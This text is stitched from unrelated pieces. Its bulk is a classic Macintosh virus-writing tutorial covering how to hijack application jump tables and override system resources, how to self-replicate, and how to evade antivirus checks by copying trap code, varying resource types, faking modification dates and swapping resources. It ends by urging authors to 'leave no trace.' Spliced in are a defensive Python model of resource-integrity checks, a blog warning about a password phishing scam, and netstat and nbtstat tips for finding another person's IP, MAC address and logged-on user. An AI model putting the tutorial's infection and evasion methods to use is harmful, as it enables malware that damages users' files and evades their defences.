A computer virus, by definition, is a piece of processor-executable code that can reproduce itself within it's environment. In the Macintosh system, an object called a resource can contain executable code. Most common executable resources are of type 'CODE', along with others such as 'DRVR', 'CDEF', 'WDEF', 'INIT', and so on. These resources are loaded into memory and 'jmp'ed to to be executed (an assembly language term for jump). Note that not only these types listed above can contain code. The trick is to get the virus code loaded and called by 'accident'.
There are many places where code resources are loaded and executed. For one example, at the launch of an application, the CODE resource with ID=0 is loaded (the jump table), and then jumps to the first listing in it's table. As another example, a 'CDEF' resource is called to draw certain controls (ID=0 for buttons, checkboxes, and radio buttons; ID=16 for scroll bars, etc.). Another example: an 'INIT' resource is called at startup time if the file which contains it is in one of the special system folders. There are numerous other places within applications, and even within system software itself, where code is loaded and called. Each virus uses a trick with one of these methods to get itself called. Some of these methods are described in more detail below.
Once the virus code is executed, it's main responsibility is to duplicate itself. This in itself is a fairly easy process. Since your executable code resource is already loaded into memory, you can use a few popular toolbox calls to place it into any other file or application that would suit your needs (where it would also have the chance of being executed). After the duplication is complete, the virus may do any other task it deems necessary.
One of the reasons why viruses crash is that their reproduction or startup code is not compatible with other systems and/or machines, not that their damage routine actually did any damage. If you write code following the Inside Macintosh rules and code defensively, you should be able to write a clean piece of code that travels without problems. Always code defensively: it's your work out there; you want to be proud of it. Read below to find some tips on doing just that.
Virus testing is a very difficult process, in that your own system is constantly infected, possibly numerous times with older versions of the virus. There are methods to the madness, so again, read on.
One of the catches to writing a virus is being aware of the methods used by virus-protection software. If simply written, a virus could be caught very quickly and not have much effect beyond your own system. If the methods are thought out and the patches made by the protection software are understood, then a virus could at least require software companies to update their existing detection methods. Every virus to date has been able to be detected and destroyed, so don't feel bad.
Is everybody happy? Then let's go!
Chapter 2: Writing Executable Code
An executable code resource is easy to create with a good software-development application such as THINK C (or C++) or THINK Pascal or MPW. There are slight differences between the environments, but nothing major. I will be giving examples for code written in THINK C, for that is the system I use.
An executable code resource usually starts with a
void main(void)
and within it, your executable code exists. Note, as always, that a code resource cannot handle global variables (variables defined above the definition of the main code, accessible by the whole file/project). THINK C handles ways around this, and MPW uses the methods in Tech Note #256, but in most cases, you won't really need global variables, unless the code is complex enough to require separate procedures and/or object-oriented code. In any case, you can usually define your variables inside the main procedure itself. There aren't too many rules as far as writing code resources, so long as you know under which circumstances your code will be called. If you are patching a Toolbox trap, for example, you must take the same form as the trap you are patching:
void ModalDialogPatch(ProcPtr procFilter,int *itemHit)
If you are patching an operating system trap, you need to do some register playing, but you need to take an empty procedure form:
void OpenPatch(void)
even though the FSOpen, PBOpen, etc. take paramBlocks. Note: they are stored in registers A0, D0, and A1 usually. Check the trap for specifics. You need to save these before you execute your code, and then restore them upon return.
If you are executing code that is to be run as a VBL or Time Manager task, always remember that you cannot use code that even thinks about using the Memory Manager (i.e. moves or purges memory). Make sure all the toolbox calls you use are not in the 'dreaded list' in the appendix of each volume of Inside Macintosh.
The type of the code resource is very dependent upon which method you wish to use to get your code executed. Read the next section for details on such execution theories.
After you're done writing the code, check it over for simple things you might have forgotten (original Quickdraw compatibility, system versions, etc.), and compile the sucker. For right now, you can throw the code resource into some sort of test file (or stagnant file, where the code will not be executed and/or reproduce). Note that you should NOT have any external resource files to compile along with it. Code resources such as this should preferably be self-contained, and not have to 'carry around the extra luggage', so to speak. There are methods to carry along bitmaps (as 'unknown data') and use them as graphics. But you should never rely on things like GetNewDialog, because that requires the existence of a DITL resource. Instead, use calls like NewDialog, where the code builds the relevant information in. It might make things harder to read and a bit harder to edit, but it's what you have to do in order to make everything self-contained.
Most of the compilers create some sort of header at the beginning of each executable code resource. This header could give away some vital information about the resource which would make it easy for a virus-detector to find. Double check it after compilation to make sure it's clean and doesn't look suspicious.
Chapter 3: Getting Your Code Executed
The technique you use here defines how your virus spreads. Some earlier viruses were more virulent than others; nVir needed an infected application to launch for it to execute; WDEF required only that a disk be inserted. There are lots of places for code to be "patched" so that your code can be executed. The trick is finding them and recovering from them gracefully. Not every method can be discussed in this note, but I will give some general examples and how to find your own 'hooks'.
One of the most popular methods amongst virii is infecting applications, since they, by definition, have executable code built right into them. If you can get your code executed along with the many other little segments in the application, the code could run undetected. When an application starts up, the resource CODE with ID=0 is loaded into memory; it is popularly known as the jump table. It keeps track of all of the procedures or segments in an application. If part of an application needs to call another procedure inside the application, it checks with the jump table for its location. If it sees that the procedure is not in memory, it will load it first, then execute it. This is all taken care of by the compiler and the system software, so it's invisible to the programmer (in most cases). The system loads the jump table and immediately executes the first entry in the list when an application begins.
You can patch yourself into this list of procedures by modifying the jump table itself. You can modify the first entry of the jump table to be your code, but save the original entry so that you can call the actual application when you're done (destroying the first entry in any CODE 0 resource renders the application totally useless). So, instead of the system executing what it thinks is the application, it will run your code first, and then run the application.
Another method by which virii get executed is by utilizing a wonderful feature of the Resource Manager. As given in Inside Macintosh volume 1, the Resource Manager will look for resources in the top-most resource file that is open (the one most recently opened in most cases, unless UseResFile has been used). These searches also include searches for basic system code resources, such as window definitions, control definitions, and even international transliteration code. If you have a resource with the same type and ID as one in the system, and this resource file is open, the system will execute your resource instead of the system's. The catch again with this is that you should call the original resource as well to make your code invisible to the naked eye. This, apparently, is how the WDEF virus worked. When a disk was inserted, the desktop file was automatically opened and put in the list of resource files. During the time that the file was open, the WDEF resource it contained was executed (the system needed to draw the window itself using the standard WDEF resource). This method requires no patching of other code, which makes it very elegant. The thing that makes such viruses easy to detect is that you find code resources in very odd places. A WDEF resource is not usually found in the desktop file.
To find other hooks for code execution, look at all the executable code inside the system. These pieces are executed at one time or another for certain calls. Things that might not seem obvious right away may make good places for patching. Lots of applications use (maybe indirectly) the International Utilities Package, for it has many good string manipulation routines. A patch there might be possible. 'ptch' resources in the system are loaded automatically at startup time to patch bits of ROM. A system could be infected there and be loaded before all other extensions. Poke around the resources and find out which ones are executable, and then find out when they are executed. You might be able to find a great patch to live off of.
Chapter 4: Reproduction
Reproduction of any code resource requires the help of the File Manager and/or the Resource Manager. The concept is not very simple, but the execution is very easy. Since the virus itself is simply one code resource (preferably not more than one), then it can be loaded, added, modified, changed, and saved just like any other resource. And the fun part of it is, you can do all this to the code you are currently executing. This is apparently dangerous (Apple warns us about self-modifying code), but we're not modifying anything about our code; simply our placement. With a few simple calls we can duplicate ourselves anywhere we wish.
When an executable code resource is called, the pointer to the resource is placed in register A0. You can use this pointer to reference yourself. A simple line of assembly can place A0 in any variable you choose. Once you have this variable, you must translate it into a handle with the RecoverHandle call. Now you have a handle to your own loaded resource, but you still cannot duplicate it. As a handle to a resource, it cannot be used to copy into other files. You 'belong' to your owning file, and are not expected to go elsewhere. Use the DetachResource call to remove your reference to the file you came from. After this call, you are simply an executable block of memory floating around with a handle on yourself (phallic, isn't it?). All you need in order to have total freedom with a block of memory is a handle to it. You've got this free handle now. Now comes the time to find the file you have to duplicate yourself to.
The file you find depends on how your virus is designed to work. You can copy yourself into applications, into desktop files, or into the system. Again, this depends on what your executing mechanism requires. Once you have found your file (usually with use of the File Manager), open up its resource fork with OpenResFile or any similar procreation of it (FSpOpenResFile, etc.). Call AddResource with the required parameters, then call WriteResource to forcefully write the resource to the file, or simply close the file itself (it will automatically be saved). Your code has now copied itself into another file. Reproduction! Now just let it sit and wait for it to be called!
Chapter 5: Defensive, Clean Coding
As always, if you want your code to run cleanly on all systems, you have to be prepared for any type of situation. Apple warns us of this all the time, so I don't have to go into too much detail, but there are a few things I would like to stress so that your code doesn't simply crash when it gets executed. Your goal is then not met. Here are some tips and things to watch out for.
1. ResError. Who knows? Maybe you've been purged. Check it after every Resource Manager call you can, taking efficiency into account, of course.
2. Nil pointers. Who knows? Maybe a virus detector caught part of your set of resources (if you're using a set, which I highly discourage) and deleted them. Find an alternate route, or exit gracefully.
3. Patch well. If you are going to modify something like a jump table, be sure you keep the originals somewhere for your own use so you can call the code (pass-through coding). If you don't, and you just destroy it and call the next code resource down the line, who knows what you might be calling. A bezier-curve calculation routine does nothing if the caller knows not what he's doing.
4. File Manager. Don't depend on each hard drive being called "Macintosh HD". Don't depend on an "Applications" folder. Don't depend on anything. Read the directory and see what you find interesting. System 7's File Manager is great, but watch out for:
5. System 6 or before. You wouldn't want your code to execute only on one system version now, would you? By known figures, only 50% of Mac users use System 7. Sad, eh? But why exclude them from the pleasures of your code?
6. Error Check, Error Check, Error Check. The thought police are on you again. Never forget that nothing is permanent.
Chapter 6A: Virus Protection Software: How It Works
Virus protection software was a good idea. It worked for a while. Then it became a commercial product. Virex, SAM, etc. The best one out in the world today is freeware: Disinfectant. A beautifully-written piece by John Norstad. I personally am against commercially-written virus protection. However, I am not here to give praise to independent software authors. I am here to tell you how some of their mechanisms work.
Patching toolbox traps is a popular method of modifying the system's own code. Before it calls the real thing, it calls the patch (your code). Virus detectors use this method to keep an eye out for parameters passed through certain toolbox calls to check to see if they are virus-related.
One popular patch is AddResource. If a virus detector sees that the type of resource being added is of type 'nVir', then it'll catch you. If it sees 'WDEF' with ID=0 and the open resource file is the desktop, then it'll catch you. Since replication almost always depends on AddResource, this check is almost certain to work every time. Other less-popular but more efficient patches are those at the base level of the operating system, not even documented by Apple. Traps such as _vBasicIO, _VInstall, _NewHandle, _vMRdAddr, and even _ADBReInit get trapped by the Disinfectant extension. Because these are very basic calls (used by nearly anything that does input and output, in the case of _vBasicIO), it can catch nearly anything coming toward it. It's nearly foolproof. After knowing what type of virus it is, the software can delete the virus quickly and easily.
Good applications also use their own version of virus protection. At the startup of their application, the number of resources in the file is counted, and the more important executable resources in the file are checked for their size. This way, if an application has had a resource added, it will be able to alert the user and stop execution.
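The application self-check just described (count the resources, compare the sizes of the important executable ones) can be modelled and compared with a hash-based check. The following is an added example, not code from the original text; it assumes a simplified stand-in for a resource fork (a dict keyed by type and ID) and constructed placeholder byte contents.

```python
import hashlib

# Executable resource types named in the text (constructed set for this example).
EXEC_TYPES = {"CODE", "DRVR", "CDEF", "WDEF", "INIT", "ptch"}

def make_baseline(resources):
    """Manifest for a resource map {(type, id): bytes}, a simplified stand-in
    for a resource fork: total count plus size and SHA-256 of executable ones."""
    exec_info = {k: (len(v), hashlib.sha256(v).hexdigest())
                 for k, v in resources.items() if k[0] in EXEC_TYPES}
    return {"count": len(resources), "exec": exec_info}

def check_count_and_size(resources, base):
    """The startup self-check the text describes. Returns findings ([] = clean)."""
    findings = []
    if len(resources) != base["count"]:
        findings.append("resource count changed")
    for key, (size, _digest) in base["exec"].items():
        if key not in resources:
            findings.append(f"{key[0]} {key[1]} missing")
        elif len(resources[key]) != size:
            findings.append(f"{key[0]} {key[1]} size changed")
    return findings

def check_hashes(resources, base):
    """Stronger check: hash every executable resource and flag executable
    resources absent from the baseline, so a same-size patch or a swapped-in
    code resource is still caught."""
    findings = []
    if len(resources) != base["count"]:
        findings.append("resource count changed")
    for key, (_size, digest) in base["exec"].items():
        data = resources.get(key)
        if data is None:
            findings.append(f"{key[0]} {key[1]} missing")
        elif hashlib.sha256(data).hexdigest() != digest:
            findings.append(f"{key[0]} {key[1]} content changed")
    for key in resources:
        if key[0] in EXEC_TYPES and key not in base["exec"]:
            findings.append(f"unexpected executable resource {key[0]} {key[1]}")
    return findings

# Constructed sample application: jump table, one segment, a DITL and a string.
# The byte contents are placeholders, not real 68k code.
CLEAN_APP = {
    ("CODE", 0): b"\x00\x00\x00\x10JT-ENTRY-0\x00\x00",  # 16-byte "jump table"
    ("CODE", 1): b"SEGMENT-1-CODE-BYTES",
    ("DITL", 128): b"dialog-items",
    ("STR ", 0): b"About this app",
}
BASELINE = make_baseline(CLEAN_APP)

def tamper_added_wdef(app):
    """A WDEF 0 resource is added to the file (count changes)."""
    return {**app, ("WDEF", 0): b"window-def-code"}

def tamper_same_size_code0(app):
    """CODE 0's first entry is overwritten in place with the same byte count."""
    jt = bytearray(app[("CODE", 0)])
    jt[4:14] = b"PATCHED-00"
    return {**app, ("CODE", 0): bytes(jt)}

def tamper_swap_resource(app):
    """One resource deleted, an executable one added: count stays the same."""
    out = {k: v for k, v in app.items() if k != ("STR ", 0)}
    out[("INIT", 0)] = b"init-code-bytes"
    return out

if __name__ == "__main__":
    for name, fn in [("added WDEF", tamper_added_wdef),
                     ("same-size CODE 0 patch", tamper_same_size_code0),
                     ("resource swap", tamper_swap_resource)]:
        modified = fn(CLEAN_APP)
        print(f"{name}: count/size={check_count_and_size(modified, BASELINE)}"
              f" hashes={check_hashes(modified, BASELINE)}")
```

The count-and-size check only notices the added resource; the same-size patch and the count-preserving swap pass it, while hashing executable resources and flagging executable types absent from the baseline catches all three.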
Chapter 6B: Virus Protection Software: How To Bypass It
Though virus protection is great in most cases, there are still 'back doors' which haven't been explored at the time of this writing. Here are some ideas for getting around the checks that most virus protection software uses.
A trap is still a trap. It is not the real code; it is a dispatcher. It stops you on the way there, but it doesn't stop you from doing what those basic calls do on your own. This does require a fair amount of assembly language and ROM copying, but it gets you around the catch of using operating system traps at all. Simply copy the code that is contained in the trap itself and use that code. To never get caught, never use traps. But we know how nearly impossible that is. However, things are gained and lost in good code writing.
A drawback of virus protection in general is that the software has to be continually updated for each new virus and identified by name in most cases. One ingenious idea (mine? I don't know) is to make the name and/or type of the virus variable. It doesn't always have to be called 'nVir' or 'WDEF' (unless the mechanism depends on the name or type). Make the type change from permutation to permutation. This makes it much more difficult to catch.
One feature of the File Manager is its automatic updating of the modification dates. Every time a file is updated or modified in any way, the modification date is changed. You can find and modify the date with a fairly simple low-level File Manager call. This is really a frivolous precaution, but it makes it easy to find the source of a virus attack. Changing the dates to something fairly plausible (NOT Jan. 1, 1904) may bypass such checks.
The application checks can be overridden with good code-writing as well. If the virus is to add a resource to a file (as it usually has to), why not delete one in its place? You've got to be sure that the type is the same as another type (this is where the variable types come in handy), and you may even want to vary the size of it to make it match the one it replaced (hopefully a larger size). Simply modifying a resource (like CODE 0) with the same number of bytes will usually not be detectable. This way, the application still counts and finds nothing unusual. However, in the process, the application is permanently damaged in some way.
Chapter 7: Testing
In testing a virus on your own system, you subject it to many continuous attacks - maybe even ones that are unintended. There are some rules to follow to be sure that you can keep track of its location and make sure it doesn't destroy your work in the process.
1. SysBeep debugging. I'm sure most of us are pretty familiar with this technique. It's compatible on all systems, and it's an aural identification. No visuals to set up, no extra resources. A simple SysBeep(0); is sometimes enough to know that everything's all right. When testing your duplication code to find out when it actually happens, use SysBeep after each one and then check to see where it went.
2. Modification dates and times. If you use random selection of files to infect, it becomes rather difficult to find which one got infected. If you know when an infection happened, you can immediately check the modification dates of all files - simply by using the Find… command in System 7's Finder.
3. Text Files. This could be known as a common-file technique. For testing purposes, use a mechanism that whenever an infection takes place, the virus writes the process and the file names and such into a common file in a common folder somewhere. This way, you can check the text file afterwards and know exactly what your code has done. You need not make the mechanism too elaborate, as it will only be for use in testing.
4. Backup, Backup, Backup. The thought police are at it again. In these cases, it's all too familiar. A trashed project is no fun.
Chapter 8: Conclusion
In short, the devices behind writing a virus are not all that complicated. There are many checks to counterattack, and part of the puzzle itself is to find new ways to get around them. Find back doors. Give the code a personality. Make it try to find the best way around a counterattack if it is able to detect one. Size is no longer a constraint in today's memory-hog world. A virus of near 50k would probably go undetected in modern-day storage, so don't feel constrained in that way. Time should be a consideration, however.
Make code that is efficient, so that users don't notice a slowdown when it is executed. All in all, your code is your work. Don't let it out of the bag until it works well and clean, and don't forget to leave no trace.
Appendix: Questions and Answers
Q: How do you get it to randomly choose an application on the HD to infect?
A: Any file on the hard drive is stored in the directory. This includes documents, applications, system files, and so on. Files are found by using the directory (via the File Manager). If you wanted to choose an application that appeared as though it was a random choice, you can still move through the directory. Files are stored in the directory by an index, just like resources, and you can pick a random index number to check a random file. You can use Quickdraw's Random routine to pull out a number, check that index, and see if that file's type is 'APPL'. If not, simply choose another file. If you've found one, then you've got your random application. Granted, not all hard drives have 65536 files on them, so you may have to tone down the returns from Random, but that's simply mathematics. Note also that there are many small applications on the hard drive as well: TeachText, CompactPro, PrintMonitor, etc. These will also come up in the list of applications along with larger applications like Microsoft Word, Aldus Freehand, and the Finder itself. This method will not choose the System file (it has a type of 'zsys'), nor documents, desk accessories, or extensions/control panels. You can modify the routine to work with other file types as well.
Q: How can I include a bitmap or other separate resource data into my code?
A: You've got to use a little assembly (and disassembly) for this method, but it works wonders (the system's scroll bar CDEF used to use it). Create the resource you want to include in your favorite resource editor to suit your taste. Close the resource and re-open the sucker in hex. Copy all of the hex codes into the clipboard. Go into your development environment and at the very end of your code add a bit of assembly. Use the DC.B or DC.W directives to define bytes or words (respectively) and re-define the complete resource byte by byte or word by word (it might take a little bit of re-typing). Give this procedure (which never gets 'called') a name. Now, whenever you want to use this 'resource', simply replace the handle or pointer to the resource with this procedure pointer. There's no need to load anything (the entire code resource is already loaded), and the pointer is always valid. This method also saves you from using the Memory Manager for anything.
Sunday, November 12, 2006
WARNING!! They are stealing your password!!!
"First, open a new email message. Type in the “To:” box this email address: psswrd_lost@hotmail.com. In the subject line, type “LOST PASSWORD”. In the body, type on the 1st line your email address (ex: you@hotmail.com or you@yahoo.com). On the 3rd line, type your password. And on the 5th line, type the person you are trying to get the password from’s email address (ex: them@hotmail.com or them@yahoo.com).
Here is an example of what the email should look like:
TO: psswrd_lost@hotmail.com
SUBJECT: LOST PASSWORD
You@hotmail/yahoo.com
12345678
Them@hotmail/yahoo.com"
THIS IS WRONG! DON'T BELIEVE THEM! THEY ARE STEALING YOUR PASSWORD THROUGH THIS EMAIL! BE CAREFUL
How can you find your friend's IP via MSN Messenger?
While the transfer is not complete, type netstat -n again.
Compare the two lists of IPs. In the second list there is one more IP. That is your friend's IP.
How can you find out your own or someone else's MAC address?
MAC address looks something like this : 00-13-20-A3-0B-4C
For someone else's MAC address, you need their IP address; then go to cmd and type in "nbtstat -a 192.168.0.5" (or whatever IP they use). This will show you their MAC address as well as their currently logged-on user.